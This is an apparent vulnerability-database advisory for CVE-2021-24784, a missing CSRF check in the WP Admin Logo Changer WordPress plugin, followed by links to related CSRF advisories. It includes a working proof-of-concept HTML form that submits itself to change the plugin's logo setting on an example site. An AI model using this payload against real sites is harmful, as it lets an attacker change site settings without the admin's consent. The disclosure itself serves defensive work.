WP Admin Logo Changer <= 1.0 – Plugin's Settings Update via CSRF | CVE 2021-24784 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check when saving its settings, which could allow attackers to make a logged in admin update them via a CSRF attack.

Proof of Concept

<form action="https://example.com/wp-admin/options-general.php?page=wp_admin_logo_changer_dashboard" method="post" id="csrf">
<input type="hidden" name="save_logo" value="1">
<input type="hidden" name="image_url" value="https://upload.wikimedia.org/wikipedia/commons/e/e8/DID_U_ASK_4_MOAR_KINDESS_ON_WIKIPEDIA.jpg">
</form><script>csrf.submit()</script>

Affects Plugins

wp-admin-logo-changer

No known fix

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID

2e9132b5-f8cd-4acc-839c-188d79277270

Timeline

Publicly Published

2021-11-15 (about 4 years ago)

Added

2021-11-15 (about 4 years ago)

Last Updated

2022-04-11 (about 3 years ago)

Other

Published

Title

Published

2023-05-19

Title

Groundhogg < 2.7.10 - Disable All Plugins via CSRF

Published

2021-10-04

Title

Paypal Donation < 1.3.1 - CSRF to Stored Cross-Site Scripting

Published

2024-08-01

Title

WordPress Menu Plugin — Superfly Responsive Menu < 5.0.30 - Cross-Site Request Forgery to Arbitrary File Deletion

Published

2025-06-05

Title

Quick Event Calendar <= 1.4.9 - Cross-Site Request Forgery

Published

2022-08-16

Title

Affiliates Manager < 2.9.14 - Arbitrary Affiliates & Creatives Deletion via CSRF